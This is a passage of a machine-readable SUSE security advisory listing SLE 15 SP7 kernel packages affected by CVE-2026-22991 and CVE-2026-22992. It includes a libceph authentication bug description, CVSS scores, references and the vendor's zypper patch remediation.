"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22991",
"url": "https://www.suse.com/security/cve/CVE-2026-22991"
},
{
"category": "external",
"summary": "SUSE Bug 1257220 for CVE-2026-22991",
"url": "https://bugzilla.suse.com/1257220"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2026-22991"
},
{
"cve": "CVE-2026-22992",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22992"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: return the handler error from mon_handle_auth_done()\n\nCurrently any error from ceph_auth_handle_reply_done() is propagated\nvia finish_auth() but isn\u0027t returned from mon_handle_auth_done(). This\nresults in higher layers learning that (despite the monitor considering\nus to be successfully authenticated) something went wrong in the\nauthentication phase and reacting accordingly, but msgr2 still trying\nto proceed with establishing the session in the background. In the\ncase of secure mode this can trigger a WARN in setup_crypto() and later\nlead to a NULL pointer dereference inside of prepare_auth_signature().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22992",
"url": "https://www.suse.com/security/cve/CVE-2026-22992"
},
{
"category": "external",
"summary": "SUSE Bug 1257218 for CVE-2026-22992",
"url": "https://bugzilla.suse.com/1257218"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
